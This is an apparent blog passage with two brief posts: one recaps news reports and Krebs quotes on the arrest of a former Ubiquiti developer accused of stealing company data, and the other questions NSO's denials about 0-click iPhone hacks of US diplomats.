While not a complete bonehead, we know that issues can occur which include power outages, natural disaster and other things not thought of.

What we are talking about here is someone who worked for Ubiquiti. Both articles are:

Both articles indicate that Nicholas Sharp is the person that was arrested, and at least one of the articles indicate that he downloaded tons of data.

The Krebs article indicates that he is (or was) the senior developer at the company.

Here are three paragraphs of the Krebs article.

On Dec. 28, other Ubiquiti employees spotted the unusual downloads, which had leveraged internal company credentials and a Surfshark VPN connection to hide the downloader’s true Internet address. Assuming an external attacker had breached its security, Ubiquiti quickly launched an investigation.

But Sharp was a member of the team doing the forensic investigation, the indictment alleges.

“At the time the defendant was part of a team working to assess the scope and damage caused by the incident and remediate its effects, all while concealing his role in committing the incident,” wrote prosecutors with the Southern District of New York.

I’m sure there is more that either article may not have covered, and as I’ve said, both are good reads.

Make it a great day!


More NSO denials, you decide

Continuing to read up on articles, I am not going to cover this, but this Ars Technica article titled iPhones of US diplomats hacked using “0-click” exploits from embattled NSO should be looked at.

It seems like they are continuing to deny that U.S. people are being targeted, even if they have numbers elsewhere because of where they live.

They are now claiming in this article that they will cooperate with governments now? They haven’t before. They’ve denied and continue to do so here that their software isn’t used in U.S. situations and then they say once installed, they don’t know where the software is being used.

This sounds contradictory to me. Thoughts are welcome.

